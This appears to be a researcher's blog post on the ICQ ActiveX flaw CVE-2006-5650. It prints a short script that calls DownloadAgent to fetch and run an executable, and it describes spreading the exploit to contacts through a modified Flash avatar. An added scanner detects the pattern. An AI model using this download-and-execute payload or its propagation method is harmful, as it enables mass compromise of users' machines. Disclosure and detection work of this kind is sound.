ICQ Exploit CVE-2006-5650

I'll kick off with, imho, one of my more interesting findings. It's not interesting because of the nature of the vulnerability, but because of the possible impact. It was quite some time ago already, back in the summer of 2006, when I was looking into COM objects that came installed with ICQ. If you're unfamiliar with COM objects and how they 'sneak' in with program installations, I suggest you read this article. Anyway, installing ICQ added a few COM objects that were accessible as ActiveX objects in IE6 without any warning. Most of them were a bit boring, but there was a nice design error in one of them.

The object in question had CLSID 54BDE6EC-F42F-4500-AC46-905177444300 and was also accessible under the name 'ICQPhone.SipxPhoneManager'.

It exposed a function called 'DownloadAgent' which took one parameter. The string you passed as the parameter was used as a URL; whatever was at that URL was downloaded to the local machine and then run.
So if you pointed it at a .html file, it would download the file and run it from some local ICQ directory. Pointing it at a .exe file was of course much more interesting :)

<script>
// instantiate the ICQ COM object by its ProgID, then hand DownloadAgent a URL
var icqphone = new ActiveXObject('ICQPhone.SipxPhoneManager.1');
icqphone.DownloadAgent('http://192.168.1.100/putty.exe');
</script>

would download putty.exe (yes, the real deal, and a safe test file :)) from my local network and start it.
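As an added defender-side example (not code from the original post), here is a small content scanner that flags a page instantiating the ICQPhone object by ProgID or by its CLSID and calling DownloadAgent, the pattern a web proxy or mail gateway would want to block. The sample page and the example.invalid URL in it are constructed.

```javascript
// Added example, not part of the original post: flag HTML/JS content that
// instantiates the vulnerable ICQ COM object (by ProgID or CLSID from the post)
// and calls its DownloadAgent method. Straight and typographic quotes are
// both accepted, since copy-pasted exploit pages often carry the latter.
const ICQ_PROGID = /ICQPhone\.SipxPhoneManager(?:\.\d+)?/i;
const ICQ_CLSID = /54BDE6EC-F42F-4500-AC46-905177444300/i;
const Q = `["'\u2018\u2019\u201C\u201D]`; // any quote character
const ACTIVEX_RE = new RegExp(`new\\s+ActiveXObject\\s*\\(\\s*${Q}([^"'\u2018\u2019\u201C\u201D]+)${Q}\\s*\\)`, 'gi');
const OBJECT_RE = /<object\b[^>]*\bclassid\s*=\s*["']?clsid:([0-9a-f-]{36})["']?/gi;
const DOWNLOAD_RE = new RegExp(`\\.DownloadAgent\\s*\\(\\s*${Q}([^"'\u2018\u2019\u201C\u201D]*)${Q}?`, 'gi');

// Returns every indicator found: which form instantiated the object and any
// DownloadAgent call together with the URL handed to it.
function scanForIcqPhone(html) {
  const findings = [];
  for (const m of html.matchAll(ACTIVEX_RE)) {
    if (ICQ_PROGID.test(m[1])) findings.push({ kind: 'activex-progid', value: m[1] });
  }
  for (const m of html.matchAll(OBJECT_RE)) {
    if (ICQ_CLSID.test(m[1])) findings.push({ kind: 'object-clsid', value: m[1] });
  }
  for (const m of html.matchAll(DOWNLOAD_RE)) {
    findings.push({ kind: 'download-agent', value: m[1] });
  }
  return findings;
}

// 'block' when the object is created AND DownloadAgent is invoked,
// 'suspicious' when only one half of the pattern is present, else 'clean'.
function verdict(html) {
  const f = scanForIcqPhone(html);
  const instantiated = f.some((x) => x.kind !== 'download-agent');
  const invoked = f.some((x) => x.kind === 'download-agent');
  if (instantiated && invoked) return 'block';
  if (instantiated || invoked) return 'suspicious';
  return 'clean';
}

// Constructed sample page mirroring the post's snippet (placeholder URL).
const SAMPLE_PAGE = `<html><body>
<object classid="clsid:54BDE6EC-F42F-4500-AC46-905177444300" id="icq"></object>
<script>
var icqphone = new ActiveXObject('ICQPhone.SipxPhoneManager.1');
icqphone.DownloadAgent('http://example.invalid/placeholder.exe');
</script></body></html>`;

console.log(verdict(SAMPLE_PAGE), scanForIcqPhone(SAMPLE_PAGE));
```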

So far so good, but a bit boring. ActiveX exploits were all too common back then (and even now). The impact of this exploit would be limited to the number of ICQ users who surfed with IE6 and visited your evil website.

So I decided to dive a bit deeper into ICQ and see if I could find a way to (ab)use the ICQ network to spread the joy automatically. After all, "shared joy is double joy".

After some searching I quickly noticed that ICQ used Flash for those annoying moving avatars. I remembered from a quick Flash course that it's quite easy to open a website from a Flash file, so all I needed was my own Flash file as avatar.

I decided to take the easy way: rather than dive into the ICQ protocol, I would stay on the client side and check whether anything would prevent me from loading my own Flash avatar. There wasn't anything there, so all we needed was an easy way to trick ICQ into loading our own custom Flash avatars.

The easiest way I found was to alter a small part of the ICQ client. The client was a mixture of Flash, HTML, JavaScript and some other stuff. All we needed was a small change in a single HTML file that would allow us to use our own Flash file as avatar.

C:\Program Files\ICQLite\Plugins\Feature\all\Avatar\avatars_galerry5.html

function updateData ( doCloseWin )
{
  if ( !top.icqConnector.GetIMOwnerData("IS_ONLINE") ) {
    alert(top.getTxt("ownerIsOffLine"));
    return;
  }
  if (!gl_applied)
  {
  ………

would be changed into

function updateData ( doCloseWin )
{
  if ( !top.icqConnector.GetIMOwnerData("IS_ONLINE") ) {
    alert(top.getTxt("ownerIsOffLine"));
    return;
  }
  // inserted line: ask the user for an avatar URL, defaulting to the current one
  msgImg.src = prompt(msgImg.src, msgImg.src);
  if (!gl_applied)
  {
  ………

This function was used to return the URL of the custom avatar (normally located on some ICQ website). If you now changed your own avatar, went to the 'animated avatar' section and picked a new animated avatar, you would be presented with a prompt dialog that let you override the URL of the animated devil with your own URL. This URL would then be used as your Flash avatar URL.

Abusing this would be as easy as: going offline, changing your avatar to a Flash file that would load an evil HTML page with the ICQPhone ActiveX exploit on it, and then going online again. Everyone with you on their contact list would then see a small tray window saying something like 'nick has come online', with your new, evil avatar next to it. The result would be annoying for everyone, and pretty annoying for people using IE6. Everyone would be presented with a browser popping up, but the IE6 users would also be compromised by the ICQ exploit. This of course only worked if someone had the default ICQ settings allowing the 'nick has come online' popups. But even if they hadn't, they would most likely open a chat window with a message from someone in their contact list and thus be scr*wed anyway.

This was back in 2006, and I haven't checked recently, but the last time I did check (somewhere in 2008) it was still possible to abuse the ICQ avatar in this way. So basically any browser-based exploit can be delivered using this nasty trick.

For this particular exploit I estimated that it would be possible to hit approx. 10 – 15 million ICQ users quite quickly. Based on the 'six degrees of separation' theory it would be quite easy to reach most people on ICQ pretty quickly. Not all of them would have Internet Explorer as their default browser, but in 2006 75% – 80% of all users had IE as default browser.
